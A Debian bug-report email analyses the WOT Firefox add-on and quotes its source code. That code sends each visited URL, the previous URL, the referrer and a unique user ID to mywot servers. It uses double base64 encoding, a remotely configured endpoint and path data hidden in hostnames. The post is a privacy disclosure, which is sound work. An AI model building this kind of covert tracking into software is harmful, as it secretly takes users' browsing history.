[Pkg-mozext-maintainers] Bug#842939: WOT found guilty to sell user data

kpcyrd kpcyrd at rxv.cc
Thu Nov 3 05:37:44 UTC 2016


I've had a look at the source and I can confirm the tracking code is present in debian.

Please read this blog post first:
https://www.kuketz-blog.de/wot-addon-wie-ein-browser-addon-seine-nutzer-ausspaeht/ (German)
https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fwww.kuketz-blog.de%2Fwot-addon-wie-ein-browser-addon-seine-nutzer-ausspaeht%2F (English)

It's worth a read, the tl;dr is: the author discovered the addon is
sending your browser history together with a unique identifier to mywot
servers. The author then setup a virtual machine with linux, firefox and
no addons besides WOT. Later, the canary dataset was found inside the
data dump that was acquired by the NDR.

This is the version >= stretch:

There's an event handler for `onLocationChange` that is passing the tab
location to `wot_stats.loc`:

```
			if (tabUrl && wot_stats.isWebURL(tabUrl)) {
				var ref = browser.contentDocument.referrer;
				if (request && request.referrer && typeof(request.referrer) != undefined) {
					ref = request.referrer.asciiSpec;
				}

				wot_stats.loc(tabUrl, ref);
			}
```
https://sources.debian.net/src/wot/20151208-2/content/core.js/#L81

`wot_stats.loc` is then calling `wot_stats.query`, which is sending the
data to a server (https://secure.mywot.com at the point of writing. The
endpoint is remotely configurable, I'll cover that later). I've marked
the comments that are added by myself.

```
        data = {
            "s":WOT_STATS.SID,
            "md":21,
            "pid":wot_stats.getUserId(),
            "sess":wot_stats.getSession()['id'],
            "q":encodeURIComponent(url), //(kpcyrd): this is the current url
            "prev":encodeURIComponent(wot_stats.last_prev), //(kpcyrd): this is the previously seen url
            "link":0,
            "sub": "ff",
            "tmv": WOT_STATS.VER,
            "hreferer" : encodeURIComponent(ref), //(kpcyrd): this seems to be a referer, but I didn't investigate further
            "ts" : wot_stats.utils.getCurrentTime()
        };

        var requestDataInfo = this.utils.serialize(data);
        var requestData = requestDataInfo.data;
        var requestLength = requestDataInfo.length;

        var encoded = btoa(btoa(requestData)); //(kpcyrd): base64 encode twice
        if (encoded != "") {
            var data = "e=" + encodeURIComponent(encoded);
            var statsUrl = settings[this.urlKey] + "/valid"; //(kpcyrd): get the endpoint from the config
            this.utils.postRequest(statsUrl, data, requestLength); //(kpcyrd): send data to the server, there's a unique identifier in the cookies
        }
        this.last_prev = url; //(kpcyrd): set the current url as previous url for the next request

```
https://sources.debian.net/src/wot/20151208-2/content/stats.js/#L280

After decoding the base64, the resulting request looks like this:
https://media.kuketz.de/blog/artikel/2016/wot-addon/unmaskiert2.jpg

As far as I can tell, this is happening for every page load.

The endpoint for that data is dynamic, it's fetched from
https://secure.mywot.com/config when you provide the correct parameters:

```
$ curl 'https://secure.mywot.com/config?s=241&ins=1478145149&ver=1.0'
{"ok":1,"url":"https://secure.mywot.com"}
```

Not sure why it's working like this, I assume it's to obfuscate the
endpoint they're sending data to. The code between this fetch and the
usage quoted above is unnecessary complicated. It could also be used to
bypass firewalls trying to block this.

The data that is sent with this tracking script has huge implications on
privacy, but since these are full urls (hostname, path, querystring,
anchor/fragment) this causes significant implications on security,
especially for applications that store sensitive information in query
strings.

I've also had a quick look at the version in jessie and it looks like
it's "only" operating on hostnames, but when you actually look into some
of the util functions, this doesn't seem to be the case.

```
	onLocationChange: function(progress, request, location)
	{
		if (progress.DOMWindow != this.browser.contentWindow) {
			return;
		}

		if (location) {
			wot_core.block(this, request, location.spec); //(kpcyrd): this sends data to the server
		}
		wot_core.update();
	},

```
https://sources.debian.net/src/wot/20131118-1/chrome/wot.jar%21/content/core.js/#L62


```
	block: function(pl, request, url)
	{
		try {
			if (!wot_util.isenabled() || !pl || !pl.browser || !url) {
				return;
			}
			
			if (!wot_warning.isblocking()) {
				return;
			}

			var hostname = wot_url.gethostname(url); //(kpcyrd): gethostname, but let's see what it actually does

			if (!hostname || wot_url.isprivate(hostname) ||
					wot_url.isexcluded(hostname)) {
				return;
			}

			if (wot_cache.isok(hostname)) {
				if (wot_warning.isdangerous(hostname, false) ==
						WOT_WARNING_BLOCK) { //(kpcyrd): this is one of the functions causing requests to the server, passing "hostname"
					this.showblocked(pl, request, url, hostname);
				}

				if (this.blockedstreams[url]) {
					delete this.blockedstreams[url];
				}
			} else {
				this.showloading(pl, request, url, hostname);
			}
		} catch (e) {
			dump("wot_core.block: failed with " + e + "\n");
		}
	},
```
https://sources.debian.net/src/wot/20131118-1/chrome/wot.jar%21/content/core.js/#L407


```
	gethostname: function(url)
	{
		try {
			if (!url || !url.length) {
				return null;
			}

			var ios = Components.classes["@mozilla.org/network/io-service;1"]
						.getService(Components.interfaces.nsIIOService);

			var parsed = ios.newURI(url, null, null); //(kpcyrd): parse the url

			if (!parsed || !parsed.host ||
					!this.issupportedscheme(parsed.scheme)) {
				return null;
			}

			var host = parsed.host.toLowerCase(); //(kpcyrd): get the hostname as the function name suggests

			if (!host) {
				return null;
			}

			while (this.isequivalent(host)) {
				host = host.replace(/^[^\.]*\./, "");
			}

			return wot_shared.encodehostname(host, parsed.path); //(kpcyrd): call a function and pass both the hostname, and the path
		} catch (e) {
			/* dump("wot_url.gethostname: failed with " + e + "\n"); */
		}

		return null;
	},
```
https://sources.debian.net/src/wot/20131118-1/chrome/wot.jar%21/content/util.js/#L207


```
	encodehostname: function(host, path) //(kpcyrd): this function doesn't have any purpose besides obfuscating the fact that gethostname contains part of the path
	{
		try {
			if (!host || !path) {
				return host;
			}

			/* Clean up the path, drop query string and hash */
			path = path.replace(/^\s+/, "")
					.replace(/\s+$/, "")
					.replace(/[\?#].*$/, "");
 
			if (path.length < 2 || path[0] != "/") {
				return host;
			}

			var h = wot_idn.utftoidn(host);

			if (!h) {
				return host;
			}

			var c = path.split("/");

			if (!c || !c.length) {
				return host;
			}

			/* Drop a suspected filename from the end */
			if (path[path.length - 1] != "/" &&
					/\.[^\.]{1,6}$/.test(c[c.length - 1])) {
				c.pop();
			}

			var level = 0;

			for (var i = c.length; !level && i > 0; --i) {
				level = this.isshared(h + c.slice(0, i).join("/"));
			}

			if (!level) {
				return host;
			}

			var p = c.slice(0, level + 1).join("/").replace(/^\//, "");

			if (!p || !p.length) {
				return host;
			}

			var encoded = this.base32encode(p);

			if (encoded == null) {
				return host;
			}

			return "_p_" + encoded + "." + host; //(kpcyrd): `encoded` contains parts of the path
		} catch (e) {
			dump("wot_shared.encodehostname: failed with " + e + "\n");
		}

		return host;
	},
```
https://sources.debian.net/src/wot/20131118-1/chrome/wot.jar%21/content/shared.js/#L143

The jessie version contains less information, but as far as I can see,
this information is sent over http to http://api.mywot.com, unless the
addon "httpseverywhere" is installed. (It's explicitly checking if it's
installed).

This is a quick analysis I did within a few hours, so please consider it
incomplete, there might be more issues I didn't cover.

I think this project doesn't align with the debian goals and I would
welcome if it's getting removed from current and future releases.

thanks.



More information about the Pkg-mozext-maintainers mailing list